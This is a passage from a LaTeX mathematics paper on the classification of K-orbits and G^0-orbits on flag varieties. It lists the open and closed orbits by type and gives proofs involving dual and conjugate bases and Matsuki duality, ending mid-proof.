\begin{remark}[Open $K$-orbits]
\label{R-open}
With the notation of Remark \ref{R3.4.1} the map $\sigma_0:X_0\to X\times X$, $\mathcal{F}\mapsto(\sigma(\mathcal{F}),\mathcal{F})$ is a closed embedding.
In types A and C the flag variety $X_0$ is irreducible.
In particular there is a unique $G$-orbit $\mathbb{O}_w\subset X\times X$
such that $\mathbb{O}_w\cap \sigma_0(X_0)$ is open in $\sigma_0(X_0)$;
it corresponds to an element $w\in\mathfrak{S}_n$ maximal for the Bruhat order such that $\mathbb{O}_w$ intersects $\sigma_0(X_0)$.
In each case one finds a unique $K$-orbit $\mathcal{O}\subset X_0$ such that $\sigma_0(\mathcal{O})\subset\mathbb{O}_w$, it is therefore the (unique) open $K$-orbit of $X_0$.
This yields the following list of open $K$-orbits in types A1--A3, C1--C2:
\begin{itemize}
\item[\rm A1:] $\mathcal{O}_\mathrm{id}$;
\item[\rm A2:] $\mathcal{O}_{v_0}$ where $v_0=(1;2)(3;4)\cdots(n-1;n)$;
\item[\rm A3:] $\mathcal{O}_{(w_0^{(t)},\varepsilon)}$ where
$t=\min\{p,q\}$, $\varepsilon\equiv\mathrm{sign}(p-q)$,
and $w^{(t)}_0=\prod\limits_{k=1}^t(k;n-k+1)$;
\item[\rm C1:] $\mathcal{O}^{-1,-1}_{(w_0,\emptyset)}$;
\item[\rm C2:] $\mathcal{O}^{1,-1}_{(\hat{w}_0^{(t)},\varepsilon)}$
where $t=\min\{p,q\}$, $\varepsilon\equiv\mathrm{sign}(p-q)$, and $\hat{w}_0^{(t)}=v_0^{(t)}w_0^{(t)}v_0^{(t)}$,
where $v_0^{(t)}=(1;2)(3;4)\cdots(t-1;t)$.
\end{itemize}
If $n=\dim V$ is even and the form $\omega$ is orthogonal, then the variety $X_\omega$ has two connected components.
In fact, for every isotropic flag $\mathcal{F}=(F_k)_{k=0}^n\in X_\omega$ there is a unique $\tilde{\mathcal{F}}=(\tilde{F}_k)_{k=0}^n\in X_\omega$
such that $F_k=\tilde{F}_k$ for all $k\not=m:=\frac{n}{2}$, $\tilde{F}_m\not=F_m$.
Then the map $\tilde{I}:\mathcal{F}\mapsto\tilde{\mathcal{F}}$ is an automorphism
of $X_\omega$ which maps one component of $X_\omega$ onto the other.
If $\mathcal{F}=\mathcal{F}(v_1,\ldots,v_n)$ for a basis $\underline{v}=(v_1,\ldots,v_n)$ such that
\[\omega(v_k,v_\ell)\not=0\Leftrightarrow \ell=n-k+1\]
then
$\tilde{I}(\mathcal{F}(\underline{v}))=\mathcal{F}(\underline{\tilde{v}})$
where $\underline{\tilde{v}}$ is the basis obtained from $\underline{v}$ by switching the two middle vectors $v_m,v_{m+1}$.
If $\underline{v}$ is $(w,\varepsilon)$-conjugate then $\underline{\tilde{v}}$ is $\tilde{i}(w,\varepsilon)$-conjugate where
$\tilde{i}(w,\varepsilon):=\big((m;m+1)w(m;m+1),\varepsilon\circ(m;m+1)\big)$.
Hence $\tilde{I}$ maps the $K$-orbit $\mathcal{O}^{\eta,\epsilon}_{(w,\varepsilon)}$
onto $\mathcal{O}^{\eta,\epsilon}_{\tilde{i}(w,\varepsilon)}$.
In type D3,
$X_\omega$ has exactly two open $K$-orbits.
More precisely $w=\hat{w}_0:=w_0v_0$
is maximal for the Bruhat order such that $\mathbb{O}_w\cap\sigma_0(X_0)$ is nonempty,
hence $\sigma_0^{-1}(\mathbb{O}_{\hat{w}_0})$ is open.
The permutation $\hat{w}_0$ has no fixed point if $m:=\frac{n}{2}$ is even; if $m:=\frac{n}{2}$ is odd, $\hat{w}_0$ fixes $m$ and $m+1$.
In the former case
$\sigma_0^{-1}(\mathbb{O}_{\hat{w}_0})=\mathcal{O}^{-1,1}_{(\hat{w}_0,\emptyset)}$
is a single $K$-orbit, and
$\tilde{I}(\mathcal{O}^{-1,1}_{(\hat{w}_0,\emptyset)})=\mathcal{O}^{-1,1}_{\tilde{i}(\hat{w}_0,\emptyset)}$
is a second open $K$-orbit.
In the latter case
$\sigma_0^{-1}(\mathbb{O}_{\hat{w}_0^{(m-1)}})=\mathcal{O}^{-1,1}_{(\hat{w}_0,\varepsilon)}\cup\mathcal{O}^{-1,1}_{(\hat{w}_0,\tilde\varepsilon)}$, where $(\varepsilon_m,\varepsilon_{m+1})=(\tilde\varepsilon_{m+1},\tilde\varepsilon_m)=(+1,-1)$, is the union of two distinct open $K$-orbits
which are image of each other by $\tilde{I}$.
In type BD1 the variety $X_\omega$ may be reducible
but $w=w^{(t)}_0$, for $t:=\min\{p,q\}$, is the unique maximal element of $\mathfrak{S}_n$
such that $\mathbb{O}_w\cap\sigma_0(X_0)$ is nonempty.
Then $\sigma_0^{-1}(\mathbb{O}_w)$
consists of a single $\tilde{I}$-stable open $K$-orbit, namely
$\mathcal{O}^{1,1}_{(w^{(t)}_0,\varepsilon)}$ for $\varepsilon\equiv\mathrm{sign}(p-q)$.
The flag variety $X_\omega$ has therefore a unique open $K$-orbit (which is not connected whenever $n$ is even).
\end{remark}
\begin{remark}[Closed $K$-orbits]
\label{R-closed}
We use the notation of Remarks \ref{R3.4.1}--\ref{R-open}.
As seen from Propositions \ref{P1}--\ref{P3}, in each case
one finds a unique $w_{\mathrm{min}}\in\mathfrak{S}_n$ such that $\mathbb{O}_{w_{\mathrm{min}}}\cap\sigma_0(X_0)$ is closed;
actually $w_{\mathrm{min}}=\mathrm{id}$ except in type BD1 for $p,q$ odd:
in that case $w_{\mathrm{min}}=(\frac{n}{2};\frac{n}{2}+1)$.
For every $K$-orbit $\mathcal{O}\subset X_0$ the following equivalence holds:
\[
\mbox{$\mathcal{O}$ is closed}\quad \Leftrightarrow\quad \sigma_0(\mathcal{O})\subset\mathbb{O}_{w_{\mathrm{min}}}
\]
(see \cite{Brion,Richardson-Springer}). In view of this equivalence, we deduce the following list of closed $K$-orbits of $X_0$ for the different types.
In types A1 and A2, $\mathcal{O}_{w_0}$ is the unique closed $K$-orbit.
In type A3 the closed $K$-orbits are exactly the orbits
$\mathcal{O}_{(\mathrm{id},\varepsilon)}$ for all pairs of the form $(\mathrm{id},\varepsilon)\in\mathfrak{I}_n(p,q)$;
there are $\binom{n}{p}$ such orbits.
In types B, C, D, the closed $K$-orbits are the orbits
$\mathcal{O}^{\eta,\epsilon}_{(\mathrm{id},\varepsilon)}$ for all pairs of the form $(\mathrm{id},\varepsilon)\in\mathfrak{I}^{\eta,\epsilon}_n(p,q)$,
except in type BD1 in the case where $n=:2m$ is even and $p,q$ are odd;
in that case the closed $K$-orbits
are the orbits $\mathcal{O}^{1,1}_{((m;m+1),\varepsilon)}$
for all pairs of the form $((m;m+1),\varepsilon)\in\mathfrak{I}^{1,1}_n(p,q)$.
There are $\binom{\lfloor\frac{p}{2}\rfloor+\lfloor\frac{q}{2}\rfloor}{\lfloor\frac{p}{2}\rfloor}$ closed orbits in types BD1 and C2, and there are $2^{\frac{n}{2}}$ closed orbits in types C1 and D3.
\end{remark}
\begin{remark} Propositions
\ref{P1}--\ref{P3} show in particular that the {\em special elements
of $X_0$}, in the sense of Matsuki \cite{Matsuki, Matsuki3}, are
precisely the flags $\mathcal{F}\in X_0$ of the form
$\mathcal{F}=\mathcal{F}(v_1,\ldots,v_n)$ where $(v_1,\ldots,v_n)$
is a basis of $V$ which is both dual and conjugate, with
respect to some involution $w\in\mathfrak{I}_n^\epsilon$ in types A1
and A2, and to some signed involution
$(w,\varepsilon)\in\mathfrak{I}_n(p,q)$ in types A3, B--D. Indeed, in view of \cite{Matsuki, Matsuki3} the set
$\mathcal{S}\subset X_0$ of special elements equals
\[\bigcup_{\mathcal{O}\in X_0/K}\mathcal{O}\cap\Xi(\mathcal{O})\]
where the map $X_0/K\to X_0/G^0$, $\mathcal{O}\mapsto\Xi(\mathcal{O})$
stands for Matsuki duality.
\end{remark}
\subsection{Proofs}
\label{S3.5}
\begin{proof}[Proof of Proposition \ref{P1}\,{\rm (a)}]
We write $w=(a_1;b_1)\cdots(a_m;b_m)$ with $a_1<\ldots<a_m$ and
$a_k<b_k$ for all $k$; let $c_1<\ldots<c_{n-2m}$ be the elements of
the set $\{k:w_k=k\}$.
In type A2 we have $n=2m$, and $(e_1,\ldots,e_n)$ is both a
$(1;2)(3;4)\cdots(n-1;n)$-dual basis and a
$(1;2)(3;4)\cdots(n-1;n)$-conjugate basis; then the basis
$\left\{e'_1,\ldots,e'_n\right\}$ given by
\[e'_{a_\ell}=e_{2\ell-1}\quad\mbox{and}\quad e'_{b_\ell}=e_{2\ell}\quad\mbox{for all $\ell\in\{1,\ldots,m\}$}\]
is simultaneously $w$-dual and $w$-conjugate.
In type A1,
up to replacing $e_\ell$ and $e_{\ell^*}$ by $\frac{e_\ell+e_{\ell^*}}{\sqrt{2}}$ and $\frac{e_\ell-e_{\ell^*}}{i\sqrt{2}}$ whenever $\ell<\ell^*$,
we may assume that
the basis $(e_1,\ldots,e_n)$ is both $\mathrm{id}$-dual
and $\mathrm{id}$-conjugate. For every $\ell\in\{1,\ldots,m\}$ and
$k\in\{1,\ldots,n-2m\}$, we set
\[e'_{a_\ell}=\frac{e_{2\ell-1}+ie_{2\ell}}{\sqrt{2}},\quad e'_{b_\ell}=\frac{e_{2\ell-1}-ie_{2\ell}}{\sqrt{2}},\quad\mbox{and}\quad e'_{c_k}=e_{2m+k}.\]
Then $(e'_1,\ldots,e'_n)$ is simultaneously a $w$-dual and a
$w$-conjugate basis.
In both cases we conclude that
\begin{equation}
\label{3.1.4}
\emptyset\not=\{\mathcal{F}(v_1,\ldots,v_n):\mbox{$(v_1,\ldots,v_n)$ is $w$-dual and $w$-conjugate}\}\subset\mathcal{O}_w\cap\mathfrak{O}_w.
\end{equation}
Let us show the inverse inclusion. Assume
$\mathcal{F}=(F_0,\ldots,F_n)\in\mathcal{O}_w\cap\mathfrak{O}_w$.
Let $(v_1,\ldots,v_n)$ be a $w$-dual basis such that $\mathcal{F}=\mathcal{F}(v_1,\ldots,v_n)$.
Since $\mathcal{F}\in\mathfrak{O}_w$ we have
\begin{equation}
\label{1-new}
w_k=\min\{\ell=1,\ldots,n:\gamma(F_k)\cap F_\ell\not=\gamma(F_{k-1})\cap F_\ell\}.
\end{equation}
For all $\ell\in\{0,\ldots,n\}$ we will now construct a $w$-dual basis
$(v_1^{(\ell)},\ldots,v_n^{(\ell)})$ of $V$ such that
\begin{eqnarray}
\label{2-new}
& F_k=\langle v_1^{(\ell)},\ldots,v_k^{(\ell)}\rangle_\mathbb{C}
\quad\mbox{
for all $k\in\{1,\ldots,n\}$}
\end{eqnarray}
and
\begin{eqnarray}
\label{3-new}
&
\gamma(v_k^{(\ell)})=\left\{\begin{array}{ll}
\epsilon v_{w_k}^{(\ell)} & \mbox{if $w_k\geq k$,} \\
v_{w_k}^{(\ell)} & \mbox{if $w_k<k$}
\end{array}\right.
\quad\mbox{
for all $k\in\{1,\ldots,\ell\}$.}
\end{eqnarray}
This will then imply
$\mathcal{F}=\mathcal{F}(v_1^{(n)},\ldots,v_n^{(n)})$ for a
basis $(v_1^{(n)},\ldots,v_n^{(n)})$ both $w$-dual and $w$-conjugate,
i.e., will complete the proof of (a).
Our construction is done by induction starting with $(v_1^{(0)},\ldots,v_n^{(0)})=(v_1,\ldots,v_n)$.
Let $\ell\in\{1,\ldots,n\}$, and assume that $(v_1^{(\ell-1)},\ldots,v_n^{(\ell-1)})$ is constructed.
We distinguish three cases.
\smallskip
\noindent
{\it Case 1: $w_\ell<\ell$.}
The inequality $w_\ell<\ell=w(w_\ell)$ implies $\gamma(v_{w_\ell}^{(\ell-1)})=\epsilon v_{\ell}^{(\ell-1)}$, whence
$\gamma(v_{\ell}^{(\ell-1)})=v_{w_\ell}^{(\ell-1)}$ as $\gamma^2=\epsilon\mathrm{id}$.
Therefore the basis $(v_1^{(\ell)},\ldots,v_n^{(\ell)}):=(v_1^{(\ell-1)},\ldots,v_n^{(\ell-1)})$ fulfills conditions (\ref{2-new}) and (\ref{3-new}).
\smallskip
\noindent
{\it Case 2: $w_\ell=\ell$.}
This case occurs only in type A1.
On the one hand, (\ref{1-new}) yields
\[\gamma(v_\ell^{(\ell-1)})\in\langle v_1^{(\ell-1)},\ldots,v_\ell^{(\ell-1)},v_{w_1}^{(\ell-1)},\ldots,v_{w_{\ell-1}}^{(\ell-1)}\rangle_\mathbb{C}.\]
On the other hand, since the basis $(v_1^{(\ell-1)},\ldots,v_n^{(\ell-1)})$ is $w$-dual,
we have
\[v_\ell^{(\ell-1)}\in\langle v_1^{(\ell-1)},\ldots,v_{\ell-1}^{(\ell-1)},v_{w_1}^{(\ell-1)},\ldots,v_{w_{\ell-1}}^{(\ell-1)}\rangle_\mathbb{C}^\perp\,.\]
Hence, as $\gamma$ preserves orthogonality with respect to $\omega$,
\begin{eqnarray*}
\gamma(v_\ell^{(\ell-1)}) & \in & \langle \gamma(v_1^{(\ell-1)}),\ldots,\gamma(v_{\ell-1}^{(\ell-1)}),\gamma(v_{w_1}^{(\ell-1)}),\ldots,\gamma(v_{w_{\ell-1}}^{(\ell-1)})\rangle_\mathbb{C}^\perp \\
& & =\langle v_1^{(\ell-1)},\ldots,v_{\ell-1}^{(\ell-1)},v_{w_1}^{(\ell-1)},\ldots,v_{w_{\ell-1}}^{(\ell-1)}\rangle_\mathbb{C}^\perp.
\end{eqnarray*}
Altogether this yields a nonzero complex number $\lambda$ such that $\gamma(v_\ell^{(\ell-1)})=\lambda v_\ell^{(\ell-1)}$.
Since $\gamma$ is an involution, we have $\lambda\in\{+1,-1\}$.
In addition we know that
\[\lambda=\omega(\gamma(v_\ell^{(\ell-1)}),v_\ell^{(\ell-1)})={}^t\overline{v_\ell^{(\ell-1)}}\cdot v_\ell^{(\ell-1)}\in\mathbb{R}^+.\]
Whence $\gamma(v_\ell^{(\ell-1)})=v_\ell^{(\ell-1)}$, and we can put
$(v_1^{(\ell)},\ldots,v_n^{(\ell)}):=(v_1^{(\ell-1)},\ldots,v_n^{(\ell-1)})$.
\smallskip
\noindent
{\it Case 3: $w_\ell>\ell$.}
By (\ref{1-new}) we have
\[\gamma(v_\ell^{(\ell-1)})\in
\langle v_k^{(\ell-1)}:1\leq k\leq w_\ell\rangle_\mathbb{C}+\langle v_{w_k}^{(\ell-1)}:1\leq k\leq \ell-1\rangle_\mathbb{C}.
\]
On the other hand, arguing as in Case 2 we see that
\[\gamma(v_\ell^{(\ell-1)})\in\langle v_1^{(\ell-1)},\ldots,v_{\ell-1}^{(\ell-1)},v_{w_1}^{(\ell-1)},\ldots,v_{w_{\ell-1}}^{(\ell-1)}\rangle_\mathbb{C}^\perp.\]
Hence we can write
\begin{equation}
\label{4-new}
\gamma(v_\ell^{(\ell-1)})=\sum_{k\in I}\lambda_kv_k^{(\ell-1)}
\quad\mbox{with $\lambda_k\in\mathbb{C}$ for all $k$,}
\end{equation}
where $I:=\{k:\ell\leq k\leq w_\ell\mbox{ and }\ell\leq w_k\}\subset\hat{I}:=\{k:\ell\leq k\mbox{ and }\ell\leq w_k\}$.
Using (\ref{4-new}), the fact that the basis $(v_1^{(\ell-1)},\ldots,v_n^{(\ell-1)})$ is $w$-dual, and the definition of $\omega$ and $\gamma$, we see that
\begin{equation}
\label{5-new}
\lambda_{w_\ell}=\omega(v_\ell^{(\ell-1)},\gamma(v_\ell^{(\ell-1)}))=\epsilon\cdot{}^tv_\ell^{(\ell-1)}\overline{v_\ell^{(\ell-1)}}=\epsilon\alpha
\end{equation}
with $\alpha\in\mathbb{R}$, $\alpha>0$.
Set
\begin{eqnarray*}
&& v_\ell^{(\ell)}:=\frac{1}{\sqrt{\alpha}}v_\ell^{(\ell-1)},\quad
v_{w_\ell}^{(\ell)}:=\frac{\epsilon}{\sqrt{\alpha}}\gamma(v_\ell^{(\ell-1)}),\\
&& v_k^{(\ell)}:=v_k^{(\ell-1)}-\frac{\omega(v_k^{(\ell-1)},\gamma(v_\ell^{(\ell-1)}))}{\lambda_{w_\ell}}v_\ell^{(\ell-1)}\ \mbox{ for all $k\in \hat{I}\setminus\{\ell,w_\ell\}$}, \\
&& v_k^{(\ell)}:=v_k^{(\ell-1)}\ \mbox{ for all $k\in\{1,\ldots,n\}\setminus \hat{I}$.}
\end{eqnarray*}
Using (\ref{4-new}) and (\ref{5-new}) it is easy to check that $(v_1^{(\ell)},\ldots,v_n^{(\ell)})$ is a $w$-dual basis which satisfies (\ref{2-new}) and (\ref{3-new}).
This completes Case 3.
\end{proof}
\begin{proof}[Proof of Proposition \ref{P1}\,{\rm (b)}--{\rm (d)}]
Let $\mathcal{F}\in\mathcal{O}_w$, so
$\mathcal{F}=\mathcal{F}(v_1,\ldots,v_n)$ for some $w$-dual basis
$(v_1,\ldots,v_n)$ of $V$. From the definition of
$w$-dual basis we see that
\begin{eqnarray*}
\langle v_1,\ldots,v_{n-k}\rangle_\mathbb{C}^\perp & = & \langle v_j:w_j\notin\{1,\ldots,n-k\}\rangle_\mathbb{C} \\
& = & \langle v_j:w_j\in\{n-k+1,\ldots,n\}\rangle_\mathbb{C} \\
& = & \langle v_j:(w_0w)_j\in\{1,\ldots,k\}\rangle_\mathbb{C}\,.
\end{eqnarray*}
Therefore
\[\dim\langle v_1,\ldots,v_{n-k}\rangle_\mathbb{C}^\perp\cap\langle v_1,\ldots,v_\ell\rangle_\mathbb{C}=\big|\big\{j\in\{1,\ldots,\ell\}:(w_0w)_j\in\{1,\ldots,k\}\big\}\big|\]
for all $k,\ell\in\{1,\ldots,n\}$, which yields the equality
$w(\mathcal{F}^\perp,\mathcal{F})=w_0w$ and hence the inclusion
\begin{equation}
\label{1}
\mathcal{O}_w\subset\{\mathcal{F}\in
X:(\mathcal{F}^\perp,\mathcal{F})\in\mathbb{O}_{w_0w}\}.
\end{equation}
Let $\mathcal{F}=\mathcal{F}(v_1,\ldots,v_n)\in\mathfrak{O}_w$ for a
$w$-conjugate basis $(v_1,\ldots,v_n)$ of $V$. From the
definition of $w$-conjugate basis we get
\[\gamma(\langle v_1,\ldots,v_k\rangle_\mathbb{C})=\langle v_{w_j}:j\in\{1,\ldots,k\}\rangle_\mathbb{C}\,.\]
Therefore
\[\dim\gamma(\langle v_1,\ldots,v_k\rangle_\mathbb{C})\cap\langle v_1,\ldots,v_\ell\rangle_\mathbb{C}=\big|\big\{j\in\{1,\ldots,\ell\}:w^{-1}_j\in\{1,\ldots,k\}\big\}\big|\]
for all $k,\ell\in\{1,\ldots,n\}$, whence
$w(\gamma(\mathcal{F}),\mathcal{F})=w^{-1}=w$ (since $w$ is an
involution). This implies the inclusion
\begin{equation}
\label{2} \mathfrak{O}_w\subset\{\mathcal{F}\in
X:(\gamma(\mathcal{F}),\mathcal{F})\in\mathbb{O}_{w}\}.
\end{equation}
It is clear that the group $K$ acts transitively on the set of
$w$-dual bases, hence $\mathcal{O}_w$ is a $K$-orbit. Moreover
(\ref{1}) implies that the orbits $\mathcal{O}_w$ (for
$w\in\mathfrak{I}_w^\epsilon$) are pairwise distinct. Similarly the
subsets $\mathfrak{O}_w$ (for $w\in\mathfrak{I}_w^\epsilon$) are
pairwise distinct $G^0$-orbits.
We denote by $L_k$ the $k\times k$ matrix with $1$ on the
antidiagonal and $0$ elsewhere. Let
$\underline{v}=(v_1,\ldots,v_n)$ be a $w_0$-dual basis, in other
words,
\[
\left\{
\begin{array}{ll}
\omega(v_k,v_{n+1-k})=\left\{\begin{array}{ll}
1 & \mbox{if $k\leq\frac{n+1}{2}$} \\[1mm] \epsilon & \mbox{if $k>\frac{n+1}{2}$}
\end{array}\right. \\[4mm]
\omega(v_k,v_\ell)=0\quad\mbox{if $\ell\not=n+1-k$;}
\end{array}
\right.
\]
hence $L:=\left(\omega(v_k,v_\ell)\right)_{1\leq k,\ell\leq n}$ is
the following matrix
\[
L=L_n\quad \mbox{(type A1)}\quad\mbox{or}\quad L=\left(\begin{matrix} 0 & L_m \\ -L_m & 0 \end{matrix}\right)\quad\mbox{(type A2, $n=2m$)}.
\]
The flag $\mathcal{F}_0:=\mathcal{F}(v_1,\ldots,v_n)$ satisfies the
condition $\mathcal{F}_0^\perp=\mathcal{F}_0$. By
Richardson--Springer \cite{Richardson-Springer} every $K$-orbit
$\mathcal{O}\subset X$ contains an element of the form
$g\mathcal{F}_0$ with $g\in G$ such that
$h:=L{}^t[g]_{\underline{v}}L^{-1}[g]_{\underline{v}}\in N$ where
$[g]_{\underline{v}}$ denotes the matrix of $g$ in the basis
$\underline{v}$ and $N$ stands for the group of invertible $n\times
n$ matrices with exactly one nonzero coefficient in each row
and each column. Note that
$Lh={}^t[g]_{\underline{v}}L[g]_{\underline{v}}$ also belongs to $N$
(as $L$ does) and is symmetric in type A1 and antisymmetric in
type A2. Consequently, there are $w\in\mathfrak{I}_n$ and constants
$t_1,\ldots,t_n\in\mathbb{C}^*$ such that the matrix
$Lh=:\left(a_{k,\ell}\right)_{1\leq k,\ell\leq n}$ has the following
entries:
\[
a_{k,\ell}=0\ \mbox{ if $\ell\not=w_k$,}\qquad
a_{k,w_k}=\left\{\begin{array}{ll} t_k & \mbox{if $w_k\geq k$}
\\ \epsilon t_k & \mbox{if $w_k\leq k$.}
\end{array}\right.
\]
Since $\epsilon=-1$ in type A2, we must have $w_k\not=k$ for all $k$,
hence $w\in\mathfrak{I}'_n$. Therefore in both cases
$w\in\mathfrak{I}^\epsilon_n$.
For each $k\in\{1,\ldots,n\}$, we
choose $s_k=s_{w_k}\in\mathbb{C}^*$ such that $s_k^{-2}=t_k$
(note that $t_{w_k}=t_k$).
Thus
\[g\mathcal{F}_0=\mathcal{F}(s_1gv_1,\ldots,s_ngv_n)\,,\]
and for all $k,\ell\in\{1,\ldots,n\}$ we have
\[
\omega(s_kgv_k,s_\ell g
v_\ell)=s_ks_\ell\omega(gv_k,gv_\ell)=s_ks_\ell
a_{k,\ell}=\left\{\begin{array}{ll} 1 & \mbox{if $\ell=w_k\geq k$}
\\ \epsilon & \mbox{if $\ell=w_k< k$} \\ 0 & \mbox{if
$\ell\not=w_k$}.
\end{array}\right.
\]
Whence $g\mathcal{F}_0\in\mathcal{O}_w$. This yields
$\mathcal{O}=\mathcal{O}_w$.
We have shown that the subsets $\mathcal{O}_w$ (for
$w\in\mathfrak{I}^\epsilon_w$) are precisely the $K$-orbits of $X$. In
particular, $X=\bigcup_{w\in\mathfrak{I}^\epsilon_w}\mathcal{O}_w$ so
that the inclusion (\ref{1}) is actually an equality. By Matsuki duality the
number of $G^0$-orbits of $X$ is the same as the number of
$K$-orbits, hence the subsets $\mathfrak{O}_w$ (for
$w\in\mathfrak{I}^\epsilon_w$) are exactly the $G^0$-orbits of $X$.
Thereby equality holds in (\ref{2}). Finally we have shown parts
{\rm (b)} and {\rm (c)} of the statement.
Part (a) implies that, for every $w\in\mathfrak{I}_n^\epsilon$, the intersection $\mathcal{O}_w\cap\mathfrak{O}_w$ is nonempty and consists of a single $K\cap G^0$-orbit.
This shows that the orbit $\mathfrak{O}_w$ is the Matsuki dual of $\mathcal{O}_w$ (see \cite{Matsuki3}), and part {\rm (d)} of the statement is also proved.
\end{proof}
\begin{proof}[Proof of Proposition \ref{P2}\,{\rm (a)}]
We write $w$ as a product of pairwise disjoint transpositions
$w=(a_1;b_1)\cdots(a_m;b_m)$,
and let $c_{m+1}<\ldots<c_p$ be the elements of $\{k:w_k=k,\ \varepsilon_k=+1\}$
and $d_{m+1}<\ldots<d_q$ be the elements of $\{k:w_k=k,\ \varepsilon_k=-1\}$.
Let $\{e_1,\ldots,e_n\}=\{e_1^+,\ldots,e_p^+\}\cup\{e_1^-,\ldots,e_q^-\}$
so that $V_+=\langle e_\ell^+:\ell=1,\ldots,p\rangle_\mathbb{C}$
and $V_-=\langle e_\ell^-:\ell=1,\ldots,q\rangle_\mathbb{C}$.
Setting
\begin{eqnarray*}
& v_{a_k}:=\frac{e^+_k+e^-_k}{\sqrt{2}}\,,\,\,\ v_{b_k}:=\frac{e^+_k-e^-_k}{\sqrt{2}}\ \mbox{ for all $k\in\{1,\ldots,m\}$,} \\
& v_{c_k}:=e^+_k\ \mbox{ for all $k\in\{m+1,\ldots,p\}$, \ and }\ v_{d_k}:=e^-_k\ \mbox{ for all $k\in\{m+1,\ldots,q\}$,}
\end{eqnarray*}
it is easy to see that $(v_1,\ldots,v_n)$ is a basis of $V$ which is
$(w,\varepsilon)$-dual and $(w,\varepsilon)$-conjugate. Therefore
\begin{equation}
\label{3.5.14}
\emptyset\not=\{\mathcal{F}(\underline{v}):\mbox{$\underline{v}$ is $(w,\varepsilon)$-dual and $(w,\varepsilon)$-conjugate}\}\subset \mathcal{O}_{(w,\varepsilon)}\cap\mathfrak{O}_{(w,\varepsilon)}.
\end{equation}
For showing the inverse inclusion, consider
$\mathcal{F}=(F_0,\ldots,F_n)\in \mathcal{O}_{(w,\varepsilon)}\cap\mathfrak{O}_{(w,\varepsilon)}$.
On the one hand, since $\mathcal{F}\in\mathfrak{O}_{(w,\varepsilon)}$ there is a $(w,\varepsilon)$-dual basis $(v_1,\ldots,v_n)$ such that
$\mathcal{F}=\mathcal{F}(v_1,\ldots,v_n)$. On the other hand, the fact that $\mathcal{F}\in\mathcal{O}_{(w,\varepsilon)}$ yields
\begin{equation}
\label{8-new}
w_k=\min\{\ell=1,\ldots,n:\delta(F_k)\cap F_\ell\not=\delta(F_{k-1})\cap F_\ell\}\ \mbox{ for all $k\in\{1,\ldots,n\}$.}
\end{equation}
For all $\ell\in\{0,\ldots,n\}$ we will now construct a $(w,\varepsilon)$-dual basis
$(v_1^{(\ell)},\ldots,v_n^{(\ell)})$ such that
\begin{eqnarray}
\label{9-new}
& F_k=\langle v_1^{(\ell)},\ldots,v_k^{(\ell)}\rangle_\mathbb{C}\quad\mbox{for all $k\in\{1,\ldots,n\}$}
\\
\label{10-new}
\mbox{and} & \delta(v_k^{(\ell)})=\left\{\begin{array}{ll}
v_{w_k}^{(\ell)} & \mbox{if $w_k\not=k$,} \\
\varepsilon_k v_{k}^{(\ell)} & \mbox{if $w_k=k$} \\
\end{array}\right.\quad\mbox{for all $k\in\{1,\ldots,\ell\}$.}
\end{eqnarray}
This will then provide
a basis $(v_1^{(n)},\ldots,v_n^{(n)})$ which is both $(w,\varepsilon)$-dual and $(w,\varepsilon)$-conjugate and such that
$\mathcal{F}=\mathcal{F}(v_1^{(n)},\ldots,v_n^{(n)})$, i.e., will complete the proof of part {\rm (a)}.
The construction is carried out by induction on $\ell\in\{0,\ldots,n\}$, and
is initialized by setting
$(v_1^{(0)},\ldots,v_n^{(0)}):=(v_1,\ldots,v_n)$. Let
$\ell\in\{1,\ldots,n\}$ be such that the basis
$(v_1^{(\ell-1)},\ldots,v_n^{(\ell-1)})$ is already constructed. We
distinguish three cases.
\medskip
\noindent {\it Case 1: $w_\ell<\ell$.}
Since in this case since $w_\ell\leq\ell-1$ and $w(w_\ell)=\ell$, we get
$\delta(v_{w_\ell}^{(\ell-1)})=v_{\ell}^{(\ell-1)}$ and hence
$\delta(v_{\ell}^{(\ell-1)})=v_{w_\ell}^{(\ell-1)}$ (as
$\delta$ is an involution). Therefore the basis
$(v_1^{(\ell)},\ldots,v_n^{(\ell)}):=(v_1^{(\ell-1)},\ldots,v_n^{(\ell-1)})$
satisfies conditions (\ref{9-new}) and (\ref{10-new}).
\medskip
\noindent {\it Case 2: $w_\ell=\ell$.}
Using (\ref{8-new}) we have
\[\delta(v_\ell^{(\ell-1)})\in\langle v_1^{(\ell-1)},v_2^{(\ell-1)},\ldots,v_\ell^{(\ell-1)}\rangle_\mathbb{C}+\langle v_{w_1}^{(\ell-1)},\ldots,v_{w_{\ell-1}}^{(\ell-1)}\rangle_\mathbb{C}\,.\]
On the other hand, the fact that the basis
$(v_1^{(\ell-1)},\ldots,v_n^{(\ell-1)})$ is
$(w,\varepsilon)$-conjugate implies
\begin{align}v_\ell^{(\ell-1)}\in\langle v_1^{(\ell-1)},\ldots,v_{\ell-1}^{(\ell-1)},v_{w_1}^{(\ell-1)},\ldots,v_{w_{\ell-1}}^{(\ell-1)}\rangle_\mathbb{C}^\dag.
\label{E:induction}
\end{align}
Since $\delta$ preserves orthogonality with respect to the form
$\phi$ and since $\delta(v_k^{(\ell-1)})=v_{w_k}^{(\ell-1)}$
for all $k\in\{1,\ldots,\ell-1\}$ (by the induction hypothesis), (\ref{E:induction}) yields
\[\delta(v_\ell^{(\ell-1)})\in\langle v_1^{(\ell-1)},\ldots,v_{\ell-1}^{(\ell-1)},v_{w_1}^{(\ell-1)},\ldots,v_{w_{\ell-1}}^{(\ell-1)}\rangle_\mathbb{C}^\dag.\]
Altogether we deduce that
\[\delta(v_\ell^{(\ell-1)})=\lambda
v_\ell^{(\ell-1)}\quad\mbox{for some $\lambda\in\mathbb{C}^*$.}\]
As $\delta$ is an involution, we conclude that $\lambda\in\{+1,-1\}$.
Moreover, knowing that
$\phi(v_\ell^{(\ell-1)},v_\ell^{(\ell-1)})=\varepsilon_\ell$ we see
that
\[\lambda\varepsilon_\ell=\phi(v_\ell^{(\ell-1)},\delta(v_\ell^{(\ell-1)}))={}^t\overline{v_\ell^{(\ell-1)}}\Phi\Phi v_\ell^{(\ell-1)}={}^t\overline{v_\ell^{(\ell-1)}}v_\ell^{(\ell-1)}\geq 0.\]
Finally we conclude that $\lambda=\varepsilon_\ell$. It follows that
the basis
$(v_1^{(\ell)},\ldots,v_n^{(\ell)}):=(v_1^{(\ell-1)},\ldots,v_n^{(\ell-1)})$
satisfies (\ref{9-new}) and (\ref{10-new}).
\medskip
\noindent {\it Case 3: $w_\ell>\ell$.}
Invoking (\ref{8-new}), the fact that
$(v_1^{(\ell-1)},\ldots,v_n^{(\ell-1)})$ is
$(w,\varepsilon)$-dual, the induction hypothesis, and the fact
